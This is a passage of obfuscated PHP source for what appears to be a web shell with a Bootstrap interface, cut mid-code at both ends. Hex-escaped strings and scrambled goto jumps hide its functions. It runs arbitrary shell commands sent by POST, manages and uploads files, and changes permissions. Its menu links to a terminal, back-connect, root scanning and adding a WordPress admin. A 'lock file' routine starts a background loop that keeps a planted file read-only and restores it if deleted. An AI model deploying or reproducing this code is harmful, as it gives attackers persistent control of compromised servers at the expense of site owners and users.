?>
</div></div><div class="row mb-2"><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-toggle2-off"></i> Disable Function:</span><?php  goto yQvhJ; SOZKH: ?>
"><i class="fad fa-search"></i></a> <a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="github"data-bs-toggle2="tooltip"href="https://github.com/rhmansh"><i class="bi bi-github"></i></a></div></div></div></div></div></div><?php  goto q9Zuh; gKZcJ: $vartn = isset($_POST["\x63\157\x6d\x6d\x61\x6e\144"]) ? $defcmd . "\x20" . $_POST["\143\x6f\155\155\141\x6e\144"] : $defcmd; goto AfZc1; pdgfd: if (isset($getdir)) { if (isset($_POST["\x63\x72\145\141\164\145\x5f\146\151\x6c\x65"])) { $file_name = $_POST["\x66\x69\154\x65\x5f\156\x61\155\145"]; $filepath = $getdir . "\57" . $file_name; if (file_exists($filepath)) { echo "\74\x64\x69\166\x20\x63\154\x61\x73\x73\75\x27\x61\154\x65\x72\x74\x20\x61\154\145\x72\164\55\x64\141\x6e\147\145\162\47\x3e\106\151\154\x65\40\x73\x75\x64\141\150\40\x61\x64\141\56\x3c\57\144\x69\x76\76"; } else { if (touch($filepath)) { echo "\74\x64\151\x76\x20\143\x6c\141\x73\163\x3d\47\141\154\x65\x72\x74\x20\x61\154\145\162\164\55\x73\x75\143\143\145\x73\163\x27\76\106\151\x6c\x65\40\x62\141\162\165\x20\x62\x65\x72\150\x61\163\x69\x6c\40\x64\x69\x62\165\x61\x74\56\74\57\x64\x69\x76\76"; } else { $filecreate = fopen($filepath, "\167"); if ($filecreate == false) { echo "\x3c\x64\151\166\40\143\x6c\x61\163\x73\x3d\47\x61\x6c\145\162\x74\x20\x61\154\x65\162\164\55\x64\141\x6e\x67\x65\162\47\76\x54\x69\144\x61\153\40\144\x61\160\x61\x74\x20\155\x65\x6d\x62\x75\141\x74\x20\x66\x69\x6c\145\x20\142\141\x72\165\56\74\x2f\144\151\x76\76"; } else { fclose($filecreate); echo "\74\144\x69\x76\x20\x63\154\x61\x73\x73\x3d\47\141\154\x65\x72\x74\x20\x61\154\145\162\164\x2d\163\165\143\143\145\x73\163\47\76\x46\x69\x6c\145\40\142\x61\x72\x75\x20\142\x65\162\x68\141\163\x69\154\40\x64\x69\142\165\x61\164\56\x3c\57\144\x69\x76\x3e"; } } } } if (isset($_POST["\143\162\x65\141\x74\x65\x5f\146\157\x6c\x64\x65\x72"])) { $folder_name = $_POST["\146\x6f\x6c\144\145\x72\137\156\141\x6d\145"]; $folderpath = $getdir . "\x2f" . $folder_name; if (mkdir($folderpath) == false) { echo "\x3c\144\x69\166\x20\x63\154\x61\163\163\x3d\x27\x61\154\145\x72\x74\x20\141\154\x65\162\164\55\144\141\x6e\x67\145\162\x27\76\124\x69\144\141\x6b\x20\x64\x61\160\x61\164\x20\155\145\155\x62\x75\141\x74\40\x66\157\154\144\145\162\56\74\57\x64\151\166\x3e"; } else { echo "\x3c\x64\151\x76\40\x63\x6c\141\x73\163\x3d\47\x61\154\x65\162\x74\40\x61\x6c\x65\x72\164\55\x73\x75\143\143\145\163\163\47\76\106\x6f\x6c\144\145\x72\40\x62\141\162\x75\40\142\145\162\x68\141\x73\x69\x6c\x20\x64\x69\142\x75\141\164\56\74\x2f\144\151\x76\76"; } } echo "\12\x3c\x64\x69\x76\x20\x63\154\141\163\163\x3d\x22\162\157\x77\x20\155\x62\55\62\42\76\12\40\40\x3c\144\151\166\x20\x63\x6c\141\163\163\75\42\143\x6f\154\55\61\62\x22\76\xa\40\x20\40\x20\74\x64\151\x76\40\x63\x6c\141\x73\163\75\42\143\141\x72\144\40\x62\157\162\144\145\x72\x20\142\x6f\162\144\145\162\55\x6c\x69\x67\150\164\42\x3e\xa\40\x20\40\x20\40\40\74\144\x69\x76\40\143\154\141\163\x73\75\42\x63\x61\162\x64\55\142\157\x64\171\40\144\55\146\154\x65\170\40\146\x6c\145\x78\x2d\167\x72\x61\x70\x20\152\165\x73\x74\151\x66\171\x2d\x63\157\x6e\x74\145\156\x74\55\x63\145\x6e\164\x65\162\x22\76\12\x20\40\40\40\40\x20\40\x20\x20\40\74\x61\x20\150\x72\x65\x66\75\42\x3f\147\145\x74\x64\151\x72\x3d" . $getdir . "\x26\145\x78\75\x74\x65\x72\155\151\x6e\x61\x6c\42\x20\x63\154\141\x73\x73\x3d\x22\142\164\x6e\40\142\x74\156\x2d\162\141\x6c\145\151\x20\155\x65\x2d\x32\40\x6d\x62\x2d\x32\42\x3e\x54\145\x72\x6d\x69\156\x61\x6c\x3c\x2f\141\76\12\40\x20\x20\40\40\40\x20\40\40\x20\x3c\141\40\x68\162\x65\146\75\x22\x3f\147\145\164\x64\x69\x72\x3d" . $getdir . "\46\x65\x78\75\x61\x64\x6d\x69\156\145\x72\x22\40\143\x6c\141\163\163\75\42\142\x74\x6e\40\142\x74\x6e\55\x72\141\x6c\145\151\x20\155\x65\55\x32\40\x6d\x62\55\x32\x22\x3e\x41\144\155\x69\x6e\x65\162\x3c\x2f\x61\76\xa\x20\x20\x20\x20\x20\40\40\x20\40\40\x3c\x61\40\x68\x72\145\146\x3d\42\77\147\x65\x74\144\x69\162\x3d" . $getdir . "\x26\x65\170\75\163\143\x61\x6e\x72\x6f\164\42\x20\x63\x6c\141\163\x73\75\x22\142\164\x6e\40\142\x74\156\x2d\x72\x61\154\x65\151\40\155\145\x2d\62\40\144\x69\163\x61\x62\154\145\x64\x20\155\142\x2d\62\x22\76\123\x63\x61\x6e\40\122\xc3\xb8\xc3\270\x74\x3c\57\x61\x3e\xa\x20\x20\x20\40\40\x20\40\40\x20\x20\x3c\x61\x20\x68\162\145\146\x3d\42\x3f\147\145\164\x64\x69\162\x3d" . $getdir . "\46\x65\x78\x3d\x70\157\162\164\163\143\141\156\x22\x20\x63\x6c\141\x73\x73\x3d\x22\x62\x74\156\x20\142\x74\x6e\x2d\162\x61\x6c\x65\151\x20\x64\151\163\x61\x62\x6c\145\x64\40\x6d\x65\55\62\40\x6d\x62\55\62\42\76\120\157\x72\164\40\123\143\141\156\x3c\57\141\x3e\12\x20\x20\x20\40\x20\x20\40\40\40\40\x3c\x61\40\x68\x72\x65\146\x3d\x22\x3f\147\x65\x74\144\x69\162\x3d" . $getdir . "\46\x65\170\75\142\x61\x63\x6b\x63\x6f\156\x6e\x22\x20\x63\x6c\x61\163\163\x3d\x22\x62\164\156\x20\x62\x74\156\x2d\x72\x61\154\145\151\40\144\x69\163\141\x62\154\145\144\40\x6d\145\x2d\x32\x20\x6d\x62\55\x32\42\76\x42\141\x63\153\x20\103\157\156\156\63\x63\x74\x3c\x2f\141\x3e\12\x20\40\x20\40\40\40\x20\40\x20\x20\74\141\x20\150\x72\145\146\75\x22\x3f\147\x65\164\x64\x69\x72\x3d" . $getdir . "\x26\x65\x78\x3d\167\x70\141\144\144\x22\40\x63\x6c\x61\x73\x73\x3d\x22\x62\164\156\x20\142\164\x6e\x2d\162\141\x6c\145\x69\40\144\151\x73\141\x62\x6c\145\x64\40\155\x65\x2d\62\x20\155\x62\x2d\x32\x22\76\x41\144\144\x20\x41\x64\x6d\x69\x6e\40\50\127\x50\51\74\x2f\x61\76\xa\40\40\40\40\x20\40\40\40\40\x20\74\x61\x20\x68\x72\145\146\75\42\x3f\x67\145\x74\x64\x69\x72\x3d" . $getdir . "\x26\145\x78\75\x6c\x6f\x6b\x66\151\154\42\x20\x63\154\141\163\x73\x3d\x22\142\x74\x6e\x20\x62\x74\x6e\x2d\162\141\154\x65\151\40\x6d\145\x2d\62\x20\155\x62\55\62\x22\x3e\114\xc3\270\143\153\40\x46\x69\154\145\x3c\57\141\76\xa\40\40\40\x20\40\40\40\40\x20\40\x3c\x61\x20\x68\x72\x65\146\75\x22\77\147\x65\164\144\151\162\x3d" . $getdir . "\46\x65\x78\75\x6c\x6f\x63\x6b\x66\151\154\x65\x32\x22\40\x63\x6c\141\x73\163\75\x22\142\164\x6e\x20\x62\x74\156\x2d\162\141\154\145\151\40\155\145\55\62\x20\x70\157\163\x69\x74\x69\x6f\156\x2d\162\x65\154\x61\x74\151\x76\x65\40\x6d\142\x2d\x32\x22\x3e\x4c\157\x63\153\40\x46\151\x6c\x65\x20\x32\x3c\163\x70\141\x6e\40\143\154\141\163\163\75\x22\x70\x6f\163\x69\164\151\157\x6e\x2d\141\142\163\157\x6c\165\x74\x65\40\164\157\x70\55\x30\x20\163\164\141\162\164\55\x35\60\x20\164\162\x61\156\163\154\141\164\x65\x2d\155\x69\x64\x64\154\x65\x20\x62\141\144\x67\x65\40\142\147\55\151\x6e\x66\157\42\76\x4c\111\116\x55\x58\xa\40\x20\74\57\163\160\x61\156\x3e\74\57\x61\x3e\12\x20\x20\40\x20\40\40\40\40\x20\x20\74\141\x20\x68\x72\145\146\75\x22\x68\x74\x74\160\x73\72\x2f\x2f\147\x69\x74\150\x75\142\56\143\x6f\x6d\57\162\x68\x6d\x61\x6e\163\150\x2f\114\157\x63\141\154\x72\55\157\164\x2d\x41\114\x4c\x2d\103\x56\105\42\x20\164\x61\162\x67\145\x74\x3d\42\137\x62\x6c\x61\x6e\153\42\x20\x63\x6c\x61\x73\x73\75\x22\x62\x74\156\40\142\x74\x6e\x2d\162\141\154\145\151\40\x6d\145\x2d\x32\40\155\x62\x2d\x32\x22\76\x4c\157\x63\141\154\162\157\xc3\xb8\x74\x3c\57\x61\x3e\12\x20\x20\40\x20\40\x20\40\40\40\40\74\x61\x20\x68\162\145\146\x3d\x22\x3f\147\145\164\144\151\x72\x3d" . $getdir . "\x26\x65\x78\75\153\x69\154\x6c\x5f\x6d\145\x22\40\143\x6c\141\163\163\x3d\42\x62\x74\x6e\40\142\164\x6e\x2d\x72\x61\154\x65\x69\x32\x20\x6d\x65\55\x32\x20\x6d\x62\55\62\42\x20\x6f\156\x63\154\151\143\x6b\x3d\x22\162\x65\164\165\x72\156\40\143\x6f\x6e\146\x69\x72\x6d\x28\x27\123\165\x72\x65\x3f\x27\51\x22\x3e\x4b\x69\x6c\154\x20\123\x65\154\x66\x3c\x2f\x61\76\xa\x20\40\x20\x20\x20\x20\40\40\40\40\74\x61\40\x68\x72\145\146\75\x22\77\147\x65\164\x64\x69\x72\75" . $getdir . "\46\145\170\x3d\x6b\x65\x6c\165\x61\x72\42\x20\x63\154\141\163\x73\75\42\x62\x74\156\40\142\x74\x6e\x2d\x72\x61\x6c\x65\151\x20\x6d\x65\55\62\40\x6d\142\x2d\62\42\x3e\114\x6f\x67\157\x75\x74\74\x2f\x61\x3e\12\40\40\x20\x20\x20\x20\x20\x20\x20\x20\74\x61\x20\x68\162\x65\x66\x3d\42\77\x67\145\x74\x64\x69\x72\75" . $getdir . "\46\145\x78\x3d\162\x65\164\155\x69\x22\40\143\x6c\141\163\x73\75\x22\x62\x74\156\x20\x62\x74\x6e\x2d\x72\141\154\x65\151\x20\x6d\145\x2d\62\x20\155\142\x2d\62\x22\76\122\145\x61\x64\155\145\74\57\x61\x3e\12\40\40\x20\x20\x20\x20\74\57\144\x69\x76\x3e\12\40\40\40\40\x3c\x2f\x64\x69\166\x3e\xa\40\40\74\x2f\144\151\166\x3e\12\74\57\144\x69\166\x3e\xa\40\x20\40\x20\74\x66\157\162\155\x20\155\x65\x74\x68\157\144\x3d\42\160\157\163\x74\x22\x3e\xa\x20\40\40\x20\74\144\151\166\x20\x63\x6c\x61\163\163\75\x22\x72\x6f\167\40\x6d\x62\x2d\x32\42\76\12\x20\40\x20\x20\40\74\x64\151\166\x20\143\154\141\x73\x73\x3d\42\x63\157\154\55\x31\x32\42\76\12\40\40\x20\x20\40\x3c\144\x69\166\40\143\x6c\141\163\x73\75\x22\x63\x61\162\x64\40\142\x6f\x72\144\145\162\x20\142\157\x72\144\x65\x72\55\x6c\151\x67\150\x74\42\x3e\12\40\x20\40\x20\x20\74\x64\151\166\40\x63\154\x61\163\x73\75\42\143\141\162\x64\55\x62\157\x64\171\42\x3e\xa\40\40\40\40\40\x20\74\x64\151\x76\x20\143\154\x61\x73\x73\x3d\x22\x74\141\x62\x6c\145\55\162\145\163\160\157\156\x73\x69\x76\145\x22\76\xa\40\40\x20\x20\40\x20\x20\74\x74\141\142\x6c\145\40\x63\x6c\141\163\x73\x3d\42\164\141\x62\x6c\x65\40\x74\141\x62\154\x65\x2d\144\x61\162\x6b\40\x74\141\x62\154\145\x2d\x73\164\x72\151\x70\145\144\40\x74\145\170\x74\x2d\x6e\157\167\162\x61\x70\42\76\12\40\40\40\40\x20\x20\x20\x20\74\164\x68\x65\141\x64\x20\143\x6c\141\x73\x73\x3d\x22\164\145\x78\x74\55\154\x69\x67\150\164\x22\x3e\xa\x20\40\x20\x20\40\40\40\x20\40\74\x74\x72\x3e\12\40\x20\x20\x20\40\x20\40\40\40\x20\x3c\164\150\x20\163\x63\x6f\160\145\75\42\x63\x6f\154\x22\x3e\74\151\x6e\x70\165\x74\40\151\144\75\42\143\142\x6f\x78\x2d\x61\x6c\154\x22\40\x63\x6c\141\163\163\x3d\42\x66\x6f\x72\x6d\x2d\143\150\x65\x63\x6b\55\151\156\160\165\x74\42\x20\164\171\x70\145\x3d\x22\x63\150\x65\143\x6b\142\x6f\x78\42\x3e\x26\145\156\x73\160\73\x4e\141\x6d\x65\x73\x3c\57\x74\150\76\xa\x20\x20\x20\x20\40\40\x20\x20\40\40\x3c\x74\150\x20\163\x63\x6f\160\145\75\x22\143\157\x6c\x22\76\124\x79\x70\x65\163\74\x2f\x74\150\76\12\x20\40\x20\40\x20\x20\x20\x20\40\x20\74\164\150\40\163\143\157\160\x65\x3d\x22\x63\157\x6c\x22\x3e\123\151\172\145\163\74\57\164\150\76\xa\x20\40\x20\x20\x20\x20\x20\40\x20\40\x3c\x74\150\x20\163\x63\157\x70\x65\x3d\x22\143\x6f\x6c\42\x3e\114\x61\163\164\40\x4d\157\x64\144\x65\144\x3c\57\164\150\76\xa\x20\40\40\40\x20\40\40\40\40\x20\x3c\x74\x68\40\x73\x63\x6f\160\145\x3d\42\x63\x6f\154\x22\76\x55\111\x44\57\x47\x49\104\74\x2f\164\x68\76\12\x20\x20\40\x20\x20\x20\40\x20\40\40\x3c\164\x68\x20\x73\x63\x6f\160\x65\75\42\143\x6f\154\x22\x3e\120\x65\162\x6d\x69\163\163\151\157\156\x73\74\57\164\150\76\12\x20\40\40\40\40\40\40\40\40\40\x3c\164\150\40\x73\x63\x6f\160\x65\x3d\42\x63\x6f\154\x22\76\101\143\x74\151\x6f\156\163\74\x2f\164\150\76\xa\40\40\x20\x20\40\x20\x20\x20\x20\x3c\57\164\162\x3e\xa\40\40\40\x20\x20\40\40\x20\x3c\57\164\150\x65\x61\x64\x3e\12\40\40\40\x20\x20\x20\40\x20\x3c\164\142\x6f\144\171\x3e"; if (is_dir($getdir)) { if (is_readable($getdir)) { $filescn = scandir($getdir); $filescn = array_filter($filescn, function ($fileye) { return strcmp($fileye, "\x2e") !== 0; }); if ($filescn !== false) { function get_file_owner($path) { if (IS_WIN) { return fileowner($path) . "\57" . filegroup($path); } else { $uid = fileowner($path); return posix_getpwuid($uid)["\156\141\155\x65"] . "\x2f" . posix_getgrgid(filegroup($path))["\156\141\155\145"]; } } function get_file_perms($path) { if (IS_WIN) { return substr(sprintf("\45\x6f", fileperms($path) & 4095), -3); } else { return substr(sprintf("\x25\x6f", fileperms($path)), -3); } } foreach ($filescn as $filey) { $getpath = $getdir . "\x2f" . $filey; $getpath = trim($getpath); if (is_file($getpath)) { echo "\74\x74\162\76"; echo "\x3c\x74\x64\x3e\x3c\x69\156\160\x75\164\x20\x63\154\x61\163\x73\75\x27\146\x6f\162\x6d\55\x63\150\145\143\x6b\x2d\151\156\160\165\x74\x27\40\x74\x79\x70\145\75\47\x63\150\145\x63\x6b\142\157\170\x27\40\156\x61\155\x65\x3d\x27\143\x65\153\142\x6f\170\x5b\135\47\40\166\141\x6c\x75\145\x3d\47" . $getpath . "\x27\x3e\46\x65\156\x73\x70\73\x3c\x69\x20\x63\x6c\x61\x73\163\75\x22\x66\x61\x64\40\x66\x61\x2d\146\151\x6c\145\163\42\x20\163\164\171\x6c\x65\75\x22\55\x2d\146\141\55\x70\162\x69\x6d\x61\162\171\55\x6f\160\x61\x63\x69\x74\171\72\40\x30\56\65\73\x20\55\x2d\146\141\55\x73\x65\x63\157\x6e\144\141\x72\171\x2d\157\160\x61\143\x69\164\x79\72\x20\61\73\42\x3e\x3c\57\151\76\x26\x65\156\x73\x70\73\x3c\x61\x20\x63\154\141\163\x73\x3d\x22\164\x65\x78\x74\55\154\151\147\150\x74\x20\x74\145\x78\164\55\x64\145\143\x6f\162\141\x74\151\157\156\x2d\x6e\x6f\x6e\x65\42\x20\x68\x72\145\146\x3d\x27\x3f\x67\145\164\146\151\x6c\x65\75" . $getpath . "\47\x3e" . $filey . "\74\57\141\76\x3c\57\164\144\76"; echo "\74\164\x64\x3e\x3c\163\160\141\156\40\x63\154\141\163\x73\75\42\164\x65\x78\x74\55" . (is_writable($getpath) ? "\163\165\143\x63\x65\163\163" : (is_readable($getpath) ? "\167\150\x69\x74\145" : "\x64\141\x6e\147\145\162")) . "\x22\76\133\40\x46\151\x6c\145\x20\135\74\x2f\163\160\x61\156\76\x3c\57\x74\144\76"; $filesize = filesize($getpath); echo "\x3c\164\x64\x3e" . formatBytes($filesize) . "\x3c\x2f\x74\x64\76"; echo "\74\164\144\76" . date("\x64\x2d\x6d\55\131\57\x48\x3a\x69", filemtime($getpath)) . "\74\x2f\164\144\x3e"; $fileowner = get_file_owner($getpath); echo "\74\164\x64\76" . $fileowner . "\x3c\x2f\164\x64\76"; $perms = cekPerm($getpath); if (is_readable($getpath) && is_writable($getpath)) { echo "\x3c\164\144\x20\143\x6c\141\163\x73\75\47\164\x65\x78\164\x2d\163\165\x63\x63\x65\x73\163\x27\x3e" . $perms . "\74\57\x74\144\x3e"; } else { if (is_readable($getpath)) { echo "\x3c\164\x64\40\143\154\x61\x73\x73\x3d\47\164\145\170\164\55\x6c\151\x67\150\164\47\x3e" . $perms . "\x3c\x2f\x74\144\x3e"; } else { echo "\x3c\x74\144\40\143\x6c\141\x73\163\75\47\164\x65\x78\164\55\144\141\156\x67\x65\x72\x27\x3e" . $perms . "\x3c\x2f\164\144\x3e"; } } echo "\74\164\x64\x3e" . twomenu("\77\x67\145\x74\146\x69\x6c\145\x3d" . $getpath) . "\74\x2f\164\x64\x3e"; echo "\x3c\x2f\164\x72\x3e"; } elseif (is_dir($getpath)) { echo "\74\x74\x72\x3e"; echo "\x3c\164\x64\x3e\74\151\156\160\165\x74\x20\143\x6c\141\x73\x73\x3d\47\x66\157\x72\155\x2d\143\x68\145\x63\153\x2d\151\156\160\165\x74\x27\40\x74\x79\160\145\x3d\x27\x63\150\x65\x63\x6b\x62\x6f\x78\x27\x20\x6e\x61\155\145\75\47\x63\145\153\x62\x6f\x78\133\135\x27\40\x76\x61\154\165\x65\75\x27" . $getpath . "\x27\76\46\145\156\x73\160\x3b\74\x69\x20\143\154\141\x73\163\75\42\164\x65\x78\x74\x2d\x77\x61\162\x6e\151\x6e\147\40\146\x61\x64\x20\146\141\55\x66\157\x6c\x64\x65\162\x73\42\40\163\x74\x79\x6c\x65\75\x22\x2d\x2d\x66\141\x2d\x73\145\143\x6f\156\x64\141\162\171\x2d\157\x70\141\x63\151\x74\171\x3a\x20\61\73\42\76\74\x2f\151\x3e\x26\x65\x6e\x73\160\x3b\74\x61\40\x63\x6c\x61\x73\x73\x3d\42\x74\x65\170\x74\x2d\154\151\x67\150\x74\40\x74\145\x78\164\55\144\145\143\x6f\162\x61\164\151\157\x6e\x2d\x6e\x6f\156\145\x22\40\x68\162\145\x66\x3d\x27\77\x67\x65\x74\x64\151\x72\x3d" . $getpath . "\47\x3e" . $filey . "\x3c\x2f\141\76\x3c\57\x74\144\76"; echo "\74\x74\144\76\x3c\x73\160\141\x6e\x20\143\x6c\x61\x73\x73\75\x22\164\x65\170\x74\x2d" . (is_writable($getpath) ? "\163\x75\143\x63\145\x73\163" : (is_readable($getpath) ? "\x77\x68\x69\x74\x65" : "\x64\x61\x6e\x67\x65\162")) . "\x22\76\x5b\x20\x44\151\162\40\x5d\x3c\x2f\x73\160\x61\x6e\76\x3c\x2f\x74\144\76"; echo "\x3c\164\x64\76\x2d\x3c\x2f\x74\x64\76"; echo "\x3c\x74\x64\76\x2d\74\57\164\144\76"; $fileowner = get_file_owner($getpath); echo "\74\x74\144\x3e" . $fileowner . "\x3c\57\164\144\76"; $perms = cekPerm($getpath); if (is_readable($getpath) && is_writable($getpath)) { echo "\x3c\x74\144\40\x63\x6c\141\x73\163\x3d\47\164\x65\x78\164\55\163\x75\x63\143\145\163\x73\x27\x3e" . $perms . "\74\x2f\164\144\76"; } else { if (is_readable($getpath)) { echo "\x3c\x74\x64\x20\x63\x6c\x61\x73\163\x3d\x27\164\x65\x78\164\55\x6c\x69\x67\x68\164\x27\76" . $perms . "\x3c\57\x74\x64\x3e"; } else { echo "\x3c\164\144\x20\143\x6c\x61\x73\x73\x3d\x27\x74\145\170\164\x2d\x64\x61\156\147\145\162\x27\76" . $perms . "\x3c\x2f\x74\x64\x3e"; } } echo "\74\x74\x64\x3e" . twomenu("\77\x67\145\164\146\151\154\145\75" . $getpath) . "\x3c\x2f\164\x64\x3e"; echo "\x3c\x2f\164\x72\76"; } } } else { displayAlert("\x46\x61\x69\154\145\144\40\164\x6f\x20\x6f\x70\145\x6e\x20\144\151\162\145\143\164\x6f\x72\x79\x20\72\x20{$getdir}", "\x64\x61\x6e\x67\x65\x72"); } } else { displayAlert("{$getdir}\40\72\40\x50\141\164\x68\40\x6e\x6f\164\x20\x72\x65\141\144\x61\142\154\x65\x2e", "\x64\x61\x6e\x67\145\162"); } } else { displayAlert("{$getdir}\40\72\40\x4e\157\164\x20\x61\x20\x76\x61\x6c\151\x64\40\144\x69\x72\145\x63\164\157\x72\x79\x20\160\x61\164\x68\x2e", "\x64\x61\x6e\x67\145\x72"); } echo "\x20\74\57\164\x62\157\144\x79\76\12\x20\40\40\x20\40\x20\x20\x3c\x2f\164\141\142\x6c\145\76\12\x20\40\40\40\40\40\74\x2f\144\151\x76\x3e\xa\x20\40\40\40\40\40\x3c\57\x64\151\x76\76\12\x20\x20\40\40\x20\x20\x3c\x2f\144\151\166\76\xa\40\40\40\x20\40\x3c\x2f\144\x69\x76\x3e\xa\40\40\40\40\x3c\x2f\x64\151\166\x3e\xa\x20\x20\x3c\x64\151\166\x20\x63\x6c\x61\163\163\x3d\x22\x72\x6f\x77\x20\x70\x79\x2d\62\42\76\12\x20\x20\40\40\74\144\151\x76\40\143\154\141\163\163\x3d\x22\x63\157\154\55\63\42\x3e\12\x20\x20\40\x20\x20\40\x20\x20\x20\40\74\x64\151\166\x20\x63\x6c\141\x73\163\75\42\x66\157\x72\155\x2d\147\x72\157\165\x70\x20\x64\55\146\154\145\170\x22\x3e\12\40\40\x20\x20\40\x20\40\40\x20\40\40\40\x3c\x73\x65\x6c\145\143\164\x20\x63\x6c\x61\x73\x73\75\x22\x66\x6f\162\155\x2d\x73\x65\154\145\143\164\40\143\x6f\154\55\63\x20\x63\157\154\55\x73\x6d\x2d\x34\x20\155\x65\55\x32\x20\x62\147\55\x64\x61\162\153\40\164\145\170\164\55\167\141\x72\x6e\x69\156\147\42\x20\x6e\x61\x6d\145\75\x22\155\x61\x63\x74\x69\x6f\156\x22\x3e\xa\40\40\x20\40\74\x6f\x70\x74\x69\157\x6e\x20\166\x61\154\x75\145\x3d\x22\x68\141\160\x75\163\42\76\104\x65\154\145\164\x65\74\57\157\160\x74\x69\x6f\x6e\x3e\12\x20\40\x20\x20\74\157\160\164\x69\157\x6e\x20\166\141\154\x75\x65\75\x22\143\145\x6d\x6f\x64\x65\x22\76\103\150\155\x6f\x64\74\x2f\x6f\x70\x74\151\x6f\156\x3e\xa\x3c\x2f\x73\145\x6c\x65\x63\x74\76\xa\x3c\151\156\160\x75\x74\x20\x74\x79\160\x65\75\42\164\145\x78\x74\x22\40\143\154\x61\163\x73\75\42\x66\x6f\162\x6d\55\x63\x6f\x6e\164\162\157\x6c\40\x63\157\154\55\x33\x20\143\x6f\x6c\x2d\x73\x6d\55\64\40\x6d\x65\55\62\42\x20\x6e\141\x6d\145\75\42\x63\x65\x6d\x6f\144\x22\40\160\x6c\141\143\x65\150\157\x6c\x64\145\x72\75\x22\60\x37\x37\x37\42\x20\163\164\x79\154\x65\75\x22\x64\151\x73\160\x6c\x61\x79\x3a\40\x6e\x6f\156\145\73\42\76\xa\74\x62\x75\x74\164\x6f\156\40\164\x79\x70\x65\75\42\x73\x75\142\x6d\x69\164\42\x20\156\141\155\x65\x3d\42\x6d\x61\x73\x73\141\x63\x74\x22\40\143\x6c\x61\163\x73\75\42\142\x74\156\40\142\164\156\x2d\167\x61\162\x6e\x69\x6e\x67\40\155\163\x2d\x61\165\164\x6f\42\x3e\x53\165\x62\x6d\151\164\x3c\57\142\165\x74\164\x6f\x6e\76\12\40\x20\40\x20\x20\40\40\40\40\40\74\57\144\151\166\x3e\12\40\x20\x20\40\40\40\x20\x20\x3c\x2f\x64\x69\166\76\12\40\40\x3c\x2f\x64\x69\x76\76\xa\x3c\x2f\x66\157\162\x6d\76"; }
if(isset($_GET['ex']) && $_GET['ex'] == "lokfil") { function lockFile($file) { global $getdir; $file = $getdir . '/' . $file; $dir = sys_get_temp_dir() . '/.s'; $textFile = $dir . '/' . base64_encode($file) . '-t'; $handlerFile = $dir . '/' . base64_encode($file) . '-h'; $targetDir = dirname($file); if (file_exists($textFile)) unlink($textFile); if (file_exists($handlerFile)) unlink($handlerFile); if (!file_exists($dir)) mkdir($dir); if (!copy($file, $textFile)) { displayAlert("False, Please Check Filename", "danger"); return; } if (!chmod($file, 0444)) { displayAlert("Locked Status False", "danger"); return; } $handler = <<<EOD
<?php
@ini_set("max_execution_time", 0);
while (file_exists("$file")) {
    if (!file_exists("$file")) {
        \$t = base64_encode(file_get_contents("$textFile"));
        file_put_contents("$file", base64_decode(\$t));
    }
    if (fileperms("$file") !== 33060) {
        chmod("$file", 0444);
    }
    if (fileperms("$targetDir") !== 33261) {
        chmod("$targetDir", 0555);
    }
}
EOD; if (!file_put_contents($handlerFile, $handler)) { displayAlert("Failed To Handler File", "danger"); return; } if (IS_WIN) { excmd("start /B php $handlerFile > NUL 2>NUL"); } else { excmd("php $handlerFile > /dev/null 2>/dev/null &"); } displayAlert("Locked Status True", "success"); } }
if (isset($_POST['lokfil'])) {
    lockFile($_POST['filok']);
}
goto JIcP4; Acaur: if (isset($_POST["\x63\157\x6d\155\141\156\144"])) { $command = $_POST["\x63\157\155\155\141\156\x64"]; $jsoncmd = excmd($command, $getdir); $rescmd = $jsoncmd; if ($rescmd === false) { $error = "\145\x72\x72\157\x72"; echo $error; } else { echo $rescmd; } die; } goto lvt26; lu_RQ: ?>
</div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-py"></i> Python:</span><?php  goto XL0iB; L3Eg1: ?>
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-rb"></i> Ruby:</span><?php  goto jYFEI; u7qY1: function excmd($koman, $dir = null) { $fff = array("\163\x68\x65\x6c\154\137\145\170\145\143", "\x65\x78\145\143", "\x73\171\163\x74\145\x6d", "\160\x61\x73\163\x74\150\162\165"); $o = null; if ($dir !== null) { $koman = "\x63\144\x20\x22" . $dir . "\42\x20\46\46\x20" . $koman; } foreach ($fff as $func) { if (function_exists($func)) { $o = $func($koman); if ($o !== null) { $o = utf8_encode($o); $json = json_encode($o); if ($json !== false) { if (trim($o) === '') { $err = ''; return $err; } return $o; } } } } if (strpos(strtolower($o), "\x63\x6f\x6d\x6d\141\x6e\x64\40\156\x6f\x74\x20\x66\x6f\x75\x6e\x64") !== false) { $err = "\103\x6f\155\155\141\x6e\144\x20\156\157\164\x20\146\157\165\x6e\x64\x2e"; } else { $err = "\x4e\157\40\163\x75\x69\164\141\142\x6c\145\40\x66\165\x6e\x63\164\x69\157\x6e\x20\x66\157\x75\156\x64\x20\164\x6f\x20\145\170\145\x63\x75\164\145\x20\164\x68\145\x20\143\x6f\155\155\x61\156\x64\56"; } return $err; die; } goto Acaur; OZW8u: echo modalpost("\x43\x72\x65\141\164\x65\x20\x46\x6f\154\x64\x65\x72", "\106\x6f\x6c\x64\145\162\x20\116\141\155\x65", $modalCfolder, "\x66\x61\x64\40\146\141\x2d\146\x6f\x6c\144\145\x72\55\x70\154\165\163"); goto N5d1G; lvt26: if (isset($_GET["\x65\x78"]) && $_GET["\145\x78"] == "\153\x65\x6c\165\x61\162") { session_destroy(); header("\122\145\x66\162\x65\x73\x68\x3a\40\x30\x3b\x20\x75\162\x6c\x3d{$_SERVER["\x50\x48\120\x5f\123\x45\x4c\x46"]}"); die; } goto C2o3f; Y7joY: @clearstatcache(); goto tTGul; IU1Xg: echo modalpost("\x55\160\154\x6f\x61\x64\x20\x46\151\x6c\x65", "\x53\145\x6c\x65\143\164\x20\106\x69\154\x65", $modalUpload, "\146\141\144\x20\146\x61\x2d\x75\160\154\x6f\x61\x64"); goto dPqA6; Nqyb1: function span($text, $color) { return "\74\x73\x70\141\156\x20\x63\154\141\163\x73\x3d\42\x74\x65\170\x74\x2d" . $color . "\42\76" . $text . "\x3c\57\163\160\x61\156\76"; } goto gDQyA; pZLfW: if (isset($_GET["\145\170"]) && $_GET["\145\x78"] == "\165\x70\x6c\157\x61\x64") { if (isset($_FILES["\165\160\146\151\154\145"])) { function upFil($f, $d) { if (move_uploaded_file($f["\x74\x6d\160\x5f\x6e\x61\155\145"], $d)) { return true; } return false; } $upfile = $_FILES["\165\160\x66\x69\x6c\145"]; $upfiltodir = 